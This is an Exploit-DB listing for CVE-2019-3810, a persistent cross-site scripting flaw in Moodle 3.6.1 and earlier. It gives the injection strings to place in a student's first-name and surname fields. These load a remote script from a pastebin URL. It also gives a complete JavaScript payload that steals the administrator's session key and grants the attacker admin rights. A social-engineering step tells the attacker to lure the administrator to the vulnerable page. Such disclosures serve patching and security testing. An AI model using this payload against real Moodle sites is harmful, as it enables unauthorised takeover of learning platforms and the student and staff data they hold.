Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)

EDB-ID:

49814

CVE:

2019-3810

EDB Verified:

Author:

Fariskhi Vidyan

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2021-04-30

Vulnerable App: 
# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
# Date: 04/2021
# Exploit Author: farisv
# Vendor Homepage: https://moodle.org/
# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
# CVE: CVE-2019-3810

Moodle is a learning platform designed to provide educators, administrators,
and learners with a single robust, secure and integrated system to create
personalised learning environments.

The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
privilege escalation from student to administrator.

1. Upload the XSS payload [1] to pastebin or other similar service.
   Change the value of userid to your own id.
   Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
2. Login to your student account.
3. Set first name with:
   " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
4. Set surname with:
  ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
5. Ask the administrator to open /userpix/ page or put the link to that page
   on your post and wait.

If successful, your account will be added as administrator.

See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810

[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.

var webroot = '/';
var userid = '3';
var sesskey = '';

function get(path, success) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', webroot + path);
    xhr.onreadystatechange = function() {
        if (xhr.readyState > 3 && xhr.status == 200) {
            success(xhr.responseText);
        }
    };
    xhr.send();
    return xhr;
}

function post(path, data, success) {
    var xhr = new XMLHttpRequest();
    xhr.open('POST', webroot + path);
    xhr.onreadystatechange = function() {
        if (xhr.readyState > 3 && xhr.status == 200) {
            success(xhr.responseText);
        }
    };
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.send(encodeURI(data));
    return xhr;
}

function setAdmin() {
    // Assign administrator access to userid
    bpath = 'admin/roles/admins.php';
    data = "confirmadd=" + userid + "&sesskey=" + sesskey;
    post(bpath, data, function(data){});
}

function getSesskey(data) {
    var sesskey_find = data.indexOf('"sesskey":"');
    sesskey = data.substr(sesskey_find + 11, 10);
    setAdmin();
}

function payload() {
    // We can find Sesskey inside JS script in main page
    get('', getSesskey);
}

// Start
payload();
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services